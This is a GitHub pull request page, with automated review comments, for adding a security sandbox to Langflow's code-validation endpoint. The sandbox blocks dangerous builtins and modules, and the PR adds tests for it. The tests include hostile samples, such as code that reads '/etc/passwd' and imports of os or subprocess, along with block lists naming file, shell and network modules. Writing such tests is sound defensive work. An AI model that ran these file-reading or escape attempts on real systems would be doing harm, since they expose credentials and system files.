ref: add sandbox to exec call in validate endpoint #10696

jordanrfrazier · 2025-11-24T01:05:23Z

Summary by CodeRabbit

New Features
- Added IBM watsonx.ai support as an embedding model provider
- New embedding configuration options for token truncation and output text inclusion
Security
- Code validation now runs in a sandboxed environment by default, preventing access to server resources and dangerous operations

_{✏️ Tip: You can customize this high-level summary in your review settings.}

coderabbitai · 2025-11-24T01:05:51Z

Walkthrough

This PR introduces a security sandbox for isolated Python code execution that blocks dangerous operations and modules by default, adds IBM watsonx.ai embedding model support with provider-specific configuration, and includes comprehensive security and integration tests. A new global setting controls whether dangerous code operations are permitted during validation.

Changes

Cohort / File(s)	Summary
Sandbox Infrastructure `src/lfx/src/lfx/custom/sandbox.py`, `src/lfx/src/lfx/custom/validate.py`, `src/lfx/src/lfx/services/settings/base.py`	Introduces SecurityViolation exception, blocked builtins/modules lists, and core sandbox functions: `create_isolated_builtins()`, `create_isolated_import()`, `execute_in_sandbox()`. Integrates sandboxed import and function execution into validation flow. Adds `allow_dangerous_code_validation` configuration setting (default: False).
Sandbox Testing `src/lfx/tests/unit/custom/test_sandbox_isolation.py`, `src/lfx/tests/unit/custom/test_sandbox_security.py`	Comprehensive isolation tests (parent globals/locals, builtins mutation, namespace freshness, decorator isolation) and security tests (server secrets/credentials inaccessibility, exfiltration prevention via commands/network, module state isolation).
Code Validation Tests `src/backend/tests/unit/api/v1/test_validate.py`, `src/backend/tests/unit/utils/test_validate.py`	Adds security-focused validation endpoint tests verifying dangerous import/builtin blocking, safe code execution, and allowed module families. Updates utility test function to replace path resolution with JSON-encoded data processing.
IBM watsonx.ai Integration `src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json`	Adds IBM watsonx.ai provider support to EmbeddingModelComponent: `fetch_ibm_models()` utility, new inputs (`truncate_input_tokens`, `input_text`), provider-specific `update_build_config()` logic for model discovery and field visibility management.

Sequence Diagram(s)

sequenceDiagram
    participant User as User Code
    participant Val as validate.py
    participant Sand as sandbox.py
    participant Builtins as Isolated Builtins
    participant Imports as Isolated Imports
    
    User->>Val: compile code snippet
    Val->>Val: create exec_globals
    Val->>Sand: execute_in_sandbox(code_obj, exec_globals)
    
    Sand->>Builtins: create_isolated_builtins()
    Sand->>Imports: create_isolated_import()
    
    note over Sand: Prepare isolated environment
    Sand->>Sand: merge safe exec_globals
    Sand->>Sand: set __builtins__ to isolated
    Sand->>Sand: set __name__ and other attrs
    
    rect rgba(255, 200, 0, 0.2)
        note over Sand: Execute compiled code with isolation
        Sand->>User: exec(code_obj, isolated_globals)
    end
    
    alt Code attempts dangerous operation
        Builtins-->>Sand: raise SecurityViolation
        Sand-->>Val: SecurityViolation caught
        Val-->>User: validation fails
    else Code is safe
        User->>Imports: import langflow
        Imports-->>User: allowed (in safe list)
        Sand-->>Val: execution completes
        Val-->>User: validation succeeds
    end

sequenceDiagram
    participant Client as Client Request
    participant API as /api/v1/validate/code
    participant Handler as Validation Handler
    participant Sandbox as Sandbox Executor
    participant Config as Settings
    
    Client->>API: POST user_code
    API->>Config: check allow_dangerous_code_validation
    
    rect rgba(100, 200, 100, 0.2)
        note over Config: Default: False (block dangerous)
    end
    
    API->>Handler: validate(code, dangerous_allowed=False)
    
    Handler->>Handler: parse AST
    Handler->>Sandbox: execute imports in sandbox
    Handler->>Sandbox: execute functions in sandbox
    
    alt Dangerous operation detected
        rect rgba(255, 100, 100, 0.2)
            Sandbox-->>Handler: SecurityViolation
            Handler-->>API: 422 validation error
        end
    else Safe code
        rect rgba(100, 200, 100, 0.2)
            Sandbox-->>Handler: execution succeeds
            Handler-->>API: 200 validation passed
        end
    end
    
    API-->>Client: response

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~50 minutes

Areas requiring extra attention:

Security sandbox implementation (src/lfx/src/lfx/custom/sandbox.py) — Verify correctness of builtins isolation, import blocking mechanism, and builtins proxy to prevent sandbox escape; examine exception handling and fallback behavior.
Integration into validation flow (src/lfx/src/lfx/custom/validate.py) — Ensure sandboxed execution is correctly wired for both imports and function definitions; verify exec_globals context creation and error propagation.
Configuration setting propagation (src/lfx/src/lfx/services/settings/base.py) — Confirm that allow_dangerous_code_validation is properly threaded through to sandbox initialization and respects default-safe semantics.
Comprehensive test coverage (src/lfx/tests/unit/custom/test_sandbox_*.py) — Review assertion quality across isolation tests; verify security tests adequately cover exfiltration vectors and module state semantics.

Possibly related PRs

fix: Add IBM watsonx.ai support to EmbeddingModel #10677 — Modifies EmbeddingModelComponent with IBM watsonx.ai support (fetch_ibm_models method, truncate_input_tokens/input_text inputs, provider-specific update_build_config).
feat: Ollama and WatsonX embedding model support #10356 — Adds IBM/WatsonX provider support to EmbeddingModelComponent with provider-specific inputs and model discovery logic.
fix: changed embedding model to have api base and watsonx api endpoint #10524 — Updates EmbeddingModelComponent's IBM watsonx.ai provider handling (provider name, API endpoint configuration).

Suggested labels

enhancement, security, size:XXL

Suggested reviewers

ogabrielluiz
edwinjosechittilappilly

Pre-merge checks and finishing touches

Important

Pre-merge checks failed

Please resolve all errors before merging. Addressing warnings is optional.

❌ Failed checks (1 error, 2 warnings)

Check name	Status	Explanation	Resolution
Test Coverage For New Implementations	❌ Error	Tests contain critical structural issues: execute_in_sandbox doesn't populate exec_globals, hard-coded API keys trigger scanners, and 'requests' is in BLOCKED_MODULES.	Refactor tests to move function calls into sandboxed code strings, replace hard-coded keys with non-realistic values, remove 'requests' from BLOCKED_MODULES or use different library, and fix Ruff violations.
Test Quality And Coverage	⚠️ Warning	Pull request contains significant test quality and coverage issues preventing proper validation of sandbox implementation.	Fix broken test logic in test_sandbox_isolation.py and test_sandbox_security.py, resolve contradictory module blocking policy in test_validate.py, fix Ruff violations, add build_class to builtins, and apply asyncio.to_thread() for synchronous fetch_ibm_models() calls.
Test File Naming And Structure	⚠️ Warning	Tests have critical structural flaws: exec_globals access will fail with KeyError, unused variables present, and fake API keys match real patterns triggering security scanners.	Move function calls into code strings for proper NameError raising, remove unused variables, replace 'sk-' prefixed keys with non-matching alternatives, and verify blocked modules in test expectations.

✅ Passed checks (4 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The title accurately reflects the primary change: adding sandbox isolation to the exec call in the validate endpoint, which is the core security enhancement across multiple files.
Docstring Coverage	✅ Passed	Docstring coverage is 86.49% which is sufficient. The required threshold is 80.00%.
Excessive Mock Usage Warning	✅ Passed	Test files demonstrate excellent test design with minimal and appropriate mock usage, focusing on real behavior verification.

✨ Finishing touches

📝 Generate docstrings

🧪 Generate unit tests (beta)

Create PR with unit tests
Post copyable unit tests in a comment
Commit unit tests in branch sandbox-validate-endpoint

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

codecov · 2025-11-24T01:18:44Z

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 31.23%. Comparing base (6f6c9a7) to head (b574590).

Additional details and impacted files

@@            Coverage Diff             @@
##             main   #10696      +/-   ##
==========================================
- Coverage   31.66%   31.23%   -0.44%     
==========================================
  Files        1350     1350              
  Lines       61163    61161       -2     
  Branches     9142     9142              
==========================================
- Hits        19368    19102     -266     
- Misses      40879    41143     +264     
  Partials      916      916

Flag	Coverage Δ
backend	`50.19% <ø> (-1.73%)`	⬇️

Flags with carried forward coverage won't be shown. Click here to find out more.

Files with missing lines	Coverage Δ
src/lfx/src/lfx/custom/validate.py	`40.55% <ø> (+0.28%)`	⬆️
src/lfx/src/lfx/services/settings/base.py	`69.78% <ø> (ø)`

... and 43 files with indirect coverage changes

🚀 New features to boost your workflow:

❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

coderabbitai

Actionable comments posted: 9

🧹 Nitpick comments (2)

src/lfx/src/lfx/custom/validate.py (1)

74-85: Function definition now executed in sandbox — verify expectations for decorator/default‑arg errors

Executing each FunctionDef via execute_in_sandbox with _create_langflow_execution_context() is a good way to catch definition‑time errors (decorators, default args, annotations) without exposing server state. Just be aware this will also surface SecurityViolation (e.g., if decorators/imports inside the function hit blocked modules) through the generic except Exception path and report them as function["errors"]. Confirm that this mapping and logging ("Error executing function code") matches what the validate API and UI expect for blocked operations vs regular runtime errors.
src/backend/tests/unit/api/v1/test_validate.py (1)
183-209: Clean up W293 blank lines in docstrings for third‑party‑libs test.

Ruff reports W293 Blank line contains whitespace at line 184. That’s the empty line inside this docstring:
    """Test that third-party libraries (not in a whitelist) can be imported.
    
    Users should be able to import legitimate third-party libraries like AI libraries,
    ...
    """
You can fix it by removing the blank line or making it non‑blank:
-    """Test that third-party libraries (not in a whitelist) can be imported.
-    
-    Users should be able to import legitimate third-party libraries like AI libraries,
+    """Test that third-party libraries (not in a whitelist) can be imported.
+    Users should be able to import legitimate third-party libraries like AI libraries,
Same pattern applies to the docstrings around Lines 252 and 280; see next comment.

📜 Review details

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6f6c9a7 and 0328ae8.

⛔ Files ignored due to path filters (1)

uv.lock is excluded by !**/*.lock

📒 Files selected for processing (7)

src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
src/backend/tests/unit/utils/test_validate.py (1 hunks)
src/lfx/src/lfx/custom/sandbox.py (1 hunks)
src/lfx/src/lfx/custom/validate.py (2 hunks)
src/lfx/src/lfx/services/settings/base.py (1 hunks)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)

🧰 Additional context used

🧬 Code graph analysis (5)

src/lfx/src/lfx/custom/validate.py (1)

src/lfx/src/lfx/custom/sandbox.py (3)

create_isolated_import (140-173)

execute_in_sandbox (176-239)

isolated_import (149-171)

src/lfx/src/lfx/custom/sandbox.py (1)

src/backend/base/langflow/interface/importing/utils.py (1)

import_module (7-32)

src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)

src/lfx/src/lfx/custom/sandbox.py (1)

execute_in_sandbox (176-239)

src/lfx/tests/unit/custom/test_sandbox_security.py (1)

src/lfx/src/lfx/custom/sandbox.py (1)

execute_in_sandbox (176-239)

src/backend/tests/unit/api/v1/test_validate.py (1)

src/backend/tests/conftest.py (1)

logged_in_headers (507-513)

🪛 GitHub Actions: Ruff Style Check

src/backend/tests/unit/api/v1/test_validate.py

[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.

🪛 GitHub Check: Ruff Style Check (3.13)

src/lfx/src/lfx/custom/sandbox.py

[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix

[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead

[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead

src/backend/tests/unit/api/v1/test_validate.py

[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace

[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)

[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace

[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace

[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used

[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)

[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)

🪛 Gitleaks (8.29.0)

src/lfx/tests/unit/custom/test_sandbox_security.py

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (13)

GitHub Check: Lint Backend / Run Mypy (3.13)
GitHub Check: Lint Backend / Run Mypy (3.10)
GitHub Check: Lint Backend / Run Mypy (3.11)
GitHub Check: Lint Backend / Run Mypy (3.12)
GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 5
GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 2
GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 3
GitHub Check: Run Backend Tests / Integration Tests - Python 3.10
GitHub Check: Run Backend Tests / LFX Tests - Python 3.10
GitHub Check: Test Starter Templates
GitHub Check: Update Component Index

🔇 Additional comments (2)

src/backend/tests/unit/utils/test_validate.py (1)

70-76: Typed function example looks consistent with sandboxed validation

Using from typing import List, Optional plus json/math inside process_data aligns with _create_langflow_execution_context (which seeds List/Optional into exec_globals), so annotation evaluation and import checks should pass without introducing new edge cases.

src/lfx/src/lfx/services/settings/base.py (1)

339-349: Config flag aligns with sandbox env var; verify it’s actually wired through

Adding allow_dangerous_code_validation: bool = False with the LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION env mapping is consistent with the sandbox’s documented toggle. However, the sandbox currently appears to read the env var directly, while this Settings field is not obviously used to drive ALLOW_DANGEROUS_CODE. Please confirm that:

Setting this field (or the env var) actually affects the sandbox behavior used by /api/v1/validate/code, and

There’s no divergence between the value in Settings and the value the sandbox module uses at import time.

coderabbitai · 2025-11-24T01:20:16Z

src/backend/tests/unit/api/v1/test_validate.py

+    assert response.status_code == status.HTTP_200_OK
+    # Should have errors - dangerous imports are blocked
+    assert len(result["imports"]["errors"]) > 0 or len(result["function"]["errors"]) > 0
+    # Should mention that module is blocked
+    all_errors = result["imports"]["errors"] + result["function"]["errors"]
+    assert any("blocked" in str(err).lower() or "os" in str(err).lower() or "subprocess" in str(err).lower() for err in all_errors)
+
+
+@pytest.mark.usefixtures("active_user")
+async def test_validate_code_blocks_dangerous_builtins_by_default(client: AsyncClient, logged_in_headers):
+    """Test that dangerous builtins are blocked by default."""
+    # Code using dangerous builtins in default args should be blocked
+    # (function-definition-time execution catches this)
+    dangerous_code = """
+def test(x=open('/etc/passwd', 'r').read()):
+    return x
+"""
+    response = await client.post("api/v1/validate/code", json={"code": dangerous_code}, headers=logged_in_headers)
+    result = response.json()
+    assert response.status_code == status.HTTP_200_OK
+    # Should have errors - dangerous builtins are blocked
+    assert len(result["function"]["errors"]) > 0
+    # Should mention that builtin is blocked
+    assert any("blocked" in str(err).lower() or "open" in str(err).lower() for err in result["function"]["errors"])
+
+
+@pytest.mark.usefixtures("active_user")
+async def test_validate_code_cannot_access_server_globals(client: AsyncClient, logged_in_headers):
+    """Test that code cannot access server's global namespace."""
+    # Try to access something that would be in server globals
+    code_trying_to_escape = """
+def test():
+    # Try to access parent frame or server globals
+    import sys
+    # This should execute but in isolation - can't access server's sys module state
+    return sys.version
+"""
+    response = await client.post("api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers)
+    result = response.json()
+    assert response.status_code == status.HTTP_200_OK
+    # Code executes but in isolation - sys is imported fresh, not server's sys
+


⚠️ Potential issue | 🟠 Major

Fix Ruff E501 / F841 in dangerous‑imports and server‑globals tests.

Ruff is (correctly) flagging:

Line 101: E501 line too long.

Line 133: E501 line too long.

Line 134: F841 result is assigned but never used.

You can resolve all three without changing test semantics:

@@ async def test_validate_code_blocks_dangerous_imports_by_default(client: AsyncClient, logged_in_headers): - all_errors = result["imports"]["errors"] + result["function"]["errors"] - assert any("blocked" in str(err).lower() or "os" in str(err).lower() or "subprocess" in str(err).lower() for err in all_errors) + all_errors = result["imports"]["errors"] + result["function"]["errors"] + assert any( + "blocked" in str(err).lower() + or "os" in str(err).lower() + or "subprocess" in str(err).lower() + for err in all_errors + ) @@ async def test_validate_code_cannot_access_server_globals(client: AsyncClient, logged_in_headers): - response = await client.post("api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers) - result = response.json() + response = await client.post( + "api/v1/validate/code", + json={"code": code_trying_to_escape}, + headers=logged_in_headers, + ) @@ - assert response.status_code == status.HTTP_200_OK - # Code executes but in isolation - sys is imported fresh, not server's sys + assert response.status_code == status.HTTP_200_OK + # Code executes but in isolation - sys is imported fresh, not server's sys

This keeps the intent while satisfying Ruff line‑length and unused‑variable rules. As per pipeline failures.

🧰 Tools

🪛 GitHub Actions: Ruff Style Check

[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used

[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)

[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)

coderabbitai · 2025-11-24T01:20:16Z

src/backend/tests/unit/api/v1/test_validate.py

+@pytest.mark.usefixtures("active_user")
+async def test_validate_code_allows_third_party_libraries(client: AsyncClient, logged_in_headers):
+    """Test that third-party libraries (not in a whitelist) can be imported.
+    
+    Users should be able to import legitimate third-party libraries like AI libraries,
+    data processing libraries, etc. We only block dangerous system-level modules.
+    """
+    # Try importing a common third-party library that wouldn't be in a whitelist
+    # Using 'requests' as an example - it's a legitimate library but not dangerous
+    # Note: This test will fail if 'requests' isn't installed, but that's okay
+    # The important thing is that if it IS installed, it should be allowed
+    third_party_code = """
+try:
+    import requests
+    HAS_REQUESTS = True
+except ImportError:
+    HAS_REQUESTS = False
+
+def test():
+    return HAS_REQUESTS
+"""
+    response = await client.post("api/v1/validate/code", json={"code": third_party_code}, headers=logged_in_headers)
+    result = response.json()
+    assert response.status_code == status.HTTP_200_OK
+    # Should execute without errors - third-party libraries are allowed
+    # (unless they're in BLOCKED_MODULES like 'os', 'subprocess', etc.)
+    assert len(result["imports"]["errors"]) == 0
+    assert len(result["function"]["errors"]) == 0
+


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Third‑party library test conflicts with sandbox BLOCKED_MODULES (requests is currently blocked).

test_validate_code_allows_third_party_libraries assumes that importing requests is allowed and that validation returns no errors:

# Using 'requests' as an example - it's a legitimate library but not dangerous ... assert len(result["imports"]["errors"]) == 0 assert len(result["function"]["errors"]) == 0

However, the sandbox’s BLOCKED_MODULES set explicitly includes "requests" (and "httpx"), treating network access as dangerous. With the current sandbox, this test will fail because the import will raise a SecurityViolation, not an ImportError, and you’ll see validation errors.

You should align test expectations with the sandbox policy in one of these ways:

Option A (keep requests blocked): change the test to use some other third‑party library that is not in BLOCKED_MODULES (e.g., a common dependency in your stack), and update the comments to clarify that HTTP clients are intentionally blocked.

Option B (allow requests in validation): remove "requests" (and possibly "httpx") from BLOCKED_MODULES if you’re comfortable allowing outbound HTTP in validation, and adjust the sandbox tests accordingly.

Given the top‑level docstring in sandbox.py says that network operations are blocked by default, Option A seems more consistent with the current security model.

🏁 Script executed:

#!/bin/bash # Double‑check the current BLOCKED_MODULES definition and where this test runs. rg -n "BLOCKED_MODULES" -S src/lfx/src/lfx/custom/sandbox.py rg -n "test_validate_code_allows_third_party_libraries" -S

Length of output: 424

I need to inspect the actual contents of the BLOCKED_MODULES set to verify the review comment's claim. Let me gather that information:

[/run_scripts]

🏁 Script executed:

#!/bin/bash # View the BLOCKED_MODULES set definition (lines around 42) sed -n '42,80p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 700

Now I need to verify what happens during validation when a blocked module is encountered, and confirm the test would fail as claimed:

[/run_scripts]

🏁 Script executed:

#!/bin/bash # Check the validation logic around line 156 that checks BLOCKED_MODULES sed -n '150,175p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 1285

I need to see how the validate endpoint handles SecurityViolation exceptions and what error structure gets returned:

[/run_scripts]

🏁 Script executed:

#!/bin/bash # Find the validate endpoint code for the /api/v1/validate/code route rg -n "validate/code" -A 20 -B 5 src/backend/app/api/v1/

Length of output: 63

Let me search more broadly for the validate endpoint implementation:

[/run_scripts]

🏁 Script executed:

#!/bin/bash # Find the validate endpoint code by searching for the route handler rg -n "def.*validate.*code" -A 15 src/backend/

Length of output: 297840

Blocked module ("requests") in sandbox makes this test fail — update test or sandbox policy.

BLOCKED_MODULES in src/lfx/src/lfx/custom/sandbox.py explicitly contains "requests" and "httpx" (around line 42) and the import hook raises SecurityViolation for blocked modules (check around line 156). The test src/backend/tests/unit/api/v1/test_validate.py::test_validate_code_allows_third_party_libraries (lines 181–209) expects no import/function errors but will fail under the current sandbox policy.

Option A (recommended): change the test to import a safe, non‑blocked third‑party library (e.g., numpy, pydantic, pandas) and update the test comments to state HTTP clients are intentionally blocked.

Option B: if you want validation to allow HTTP clients, remove "requests" and "httpx" from BLOCKED_MODULES and update sandbox docs/tests to reflect the policy change.

🧰 Tools

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace

coderabbitai · 2025-11-24T01:20:16Z

src/backend/tests/unit/api/v1/test_validate.py

+@pytest.mark.usefixtures("active_user")
+async def test_validate_code_cannot_access_real_builtins(client: AsyncClient, logged_in_headers):
+    """Test that code cannot escape via real __builtins__.
+    
+    If isolation were broken, code could access the real __builtins__ to escape.
+    We test this by trying to access __builtins__ directly (which should be isolated).
+    """
+    # Try to access __builtins__ directly - if isolation is broken, this would work
+    code_trying_builtins_escape = """
+def test():
+    # Try to access __builtins__ directly from globals
+    # If isolation is broken, this would give us the real builtins
+    try:
+        real_builtins = globals().get('__builtins__')
+        # If we got real builtins, we could escape - but we should get isolated version
+        return type(real_builtins).__name__
+    except Exception:
+        return 'isolated'
+"""
+    response = await client.post("api/v1/validate/code", json={"code": code_trying_builtins_escape}, headers=logged_in_headers)
+    result = response.json()
+    assert response.status_code == status.HTTP_200_OK
+    # Code should execute successfully - the key is that __builtins__ is isolated
+    # We can't easily verify it's isolated via API, but execution without errors
+    # combined with other isolation tests proves it works
+    assert len(result["function"]["errors"]) == 0  # Should execute without errors
+
+
+@pytest.mark.usefixtures("active_user")
+async def test_validate_code_uses_isolated_sandbox(client: AsyncClient, logged_in_headers):
+    """Test that validate endpoint uses isolated sandbox.
+    
+    This test verifies that code executes in sandbox (doesn't crash).
+    Actual isolation behavior is tested in sandbox unit tests.
+    """
+    # Code that sets variables - should execute without errors
+    # (Isolation is verified in sandbox unit tests)
+    code_with_variables = """
+MY_VAR = "test"
+def test():
+    return MY_VAR
+"""
+    response = await client.post("api/v1/validate/code", json={"code": code_with_variables}, headers=logged_in_headers)


⚠️ Potential issue | 🟠 Major

Fix remaining Ruff W293 / E501 issues in builtins and sandbox‑usage tests.

Ruff flags:

W293 at lines 252 and 280: blank lines with whitespace in docstrings.

E501 at line 268: client.post(...) line too long.

You can resolve them with small formatting changes:

@@ async def test_validate_code_cannot_access_real_builtins(client: AsyncClient, logged_in_headers): - """Test that code cannot escape via real __builtins__. - - If isolation were broken, code could access the real __builtins__ to escape. + """Test that code cannot escape via real __builtins__. + If isolation were broken, code could access the real __builtins__ to escape. @@ - response = await client.post("api/v1/validate/code", json={"code": code_trying_builtins_escape}, headers=logged_in_headers) + response = await client.post( + "api/v1/validate/code", + json={"code": code_trying_builtins_escape}, + headers=logged_in_headers, + ) @@ async def test_validate_code_uses_isolated_sandbox(client: AsyncClient, logged_in_headers): - """Test that validate endpoint uses isolated sandbox. - - This test verifies that code executes in sandbox (doesn't crash). + """Test that validate endpoint uses isolated sandbox. + This test verifies that code executes in sandbox (doesn't crash).

This should clear the remaining Ruff warnings without changing test behavior.

🧰 Tools

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace

[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)

[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace

🤖 Prompt for AI Agents

In src/backend/tests/unit/api/v1/test_validate.py around lines 249 to 291, fix Ruff W293 by removing trailing whitespace/extra blank-line characters inside the two docstrings (near lines 252 and 280) and fix E501 on the long client.post(...) call (around line 268) by wrapping the call across multiple lines or assigning the URL/json to a short variable and passing it, keeping the same arguments and behavior; make only whitespace/line-break edits so tests remain functionally unchanged.

coderabbitai · 2025-11-24T01:20:16Z

src/lfx/src/lfx/custom/sandbox.py

+import builtins
+import importlib
+import os
+from typing import Any, Dict, Set
+
+
+class SecurityViolation(Exception):
+    """Raised when code attempts to escape the sandbox or use blocked operations."""
+
+    pass
+
+
+# Check if dangerous operations are allowed via environment variable
+ALLOW_DANGEROUS_CODE = os.getenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", "false").lower() == "true"
+
+# Dangerous builtins that should be blocked by default
+BLOCKED_BUILTINS: Set[str] = {
+    "open",  # File I/O


⚠️ Potential issue | 🟡 Minor

🧩 Analysis chain

Align type hints with modern typing and Ruff, and consider exception naming.

Ruff is flagging Dict/Set (UP035) and the exception name (N818). You can address both with small, non‑behavioral changes:

Use built‑in generics instead of typing.Dict / typing.Set.

Optionally rename SecurityViolation to follow the *Error convention if you want Ruff clean.

Example diff:

-import builtins -import importlib -import os -from typing import Any, Dict, Set +import builtins +import importlib +import os +from typing import Any @@ -class SecurityViolation(Exception): +class SecurityViolation(Exception): # or `SecurityViolationError` if you want to satisfy N818 """Raised when code attempts to escape the sandbox or use blocked operations.""" @@ -# Dangerous builtins that should be blocked by default -BLOCKED_BUILTINS: Set[str] = { +# Dangerous builtins that should be blocked by default +BLOCKED_BUILTINS: set[str] = { @@ -# Dangerous modules that should be blocked by default -BLOCKED_MODULES: Set[str] = { +# Dangerous modules that should be blocked by default +BLOCKED_MODULES: set[str] = {

If you do decide to rename the exception to something like SecurityViolationError, remember to update all imports/usages across the codebase and tests so they still catch the right type. As per static analysis hints.

🏁 Script executed:

#!/bin/bash # Confirm all references to the sandbox exception are updated consistently. rg -n "SecurityViolation" -S

Length of output: 504

Wait, let me correct that - I need to search properly in the repo:

🏁 Script executed:

#!/bin/bash # Search for all imports/references to SecurityViolation across entire codebase rg -n "from.*sandbox.*import|import.*SecurityViolation" --type=py rg -n "SecurityViolation" --type=py | grep -v "sandbox.py"

Length of output: 319

🏁 Script executed:

#!/bin/bash # Check if SecurityViolation is in __all__ or explicitly exported fd -e py -exec grep -l "__all__" {} \; | head -10

Length of output: 191

🏁 Script executed:

#!/bin/bash # Search for imports of SecurityViolation from sandbox module rg "from.*sandbox.*import.*SecurityViolation|import.*sandbox.*SecurityViolation" --type=py # Also search for any __all__ declarations in sandbox.py rg -A 5 "__all__" src/lfx/src/lfx/custom/sandbox.py

Length of output: 0

Type hints and exception naming are safe, localized refactoring.

Verification confirms SecurityViolation is not imported or referenced outside sandbox.py, so renaming to SecurityViolationError requires updates only within that single file (5 locations: lines 16, 128, 157, 194, 233). The Dict/Set → dict/set modernization is also straightforward and safe. Both changes align with Ruff's modern Python conventions.

🧰 Tools

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix

[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead

[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead

coderabbitai · 2025-11-24T01:20:17Z

src/lfx/src/lfx/custom/sandbox.py

+    class IsolatedBuiltinsModule:
+        """Fake builtins module that prevents escaping."""
+        def __getattr__(self, name: str) -> Any:
+            # Block dangerous builtins unless explicitly allowed
+            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
+                raise SecurityViolation(f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow.")
+            if name == "__builtins__":
+                return isolated_builtins
+            if hasattr(builtins, name):
+                return getattr(builtins, name)
+            raise AttributeError(f"module 'builtins' has no attribute '{name}'")
+
+    isolated_builtins["builtins"] = IsolatedBuiltinsModule()
+
+    return isolated_builtins
+
+
+def create_isolated_import():
+    """Create an import function that blocks dangerous modules by default.
+
+    By default, blocks dangerous modules (os, subprocess, socket, etc.).
+    Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow them.
+
+    Returns:
+        A function that performs isolated imports
+    """
+    def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0):  # noqa: A002, ARG001
+        """Import function that blocks dangerous modules by default."""
+        # Extract top-level module name
+        module_name = name.split(".")[0]
+
+        # Block dangerous modules unless explicitly allowed
+        if not ALLOW_DANGEROUS_CODE:
+            if module_name in BLOCKED_MODULES:
+                raise SecurityViolation(
+                    f"Dangerous module '{module_name}' is blocked. "
+                    f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
+                )
+            # Allow langflow.* and lfx.* modules, and any module not in BLOCKED_MODULES
+            # This allows users to import legitimate third-party libraries (AI libraries, etc.)
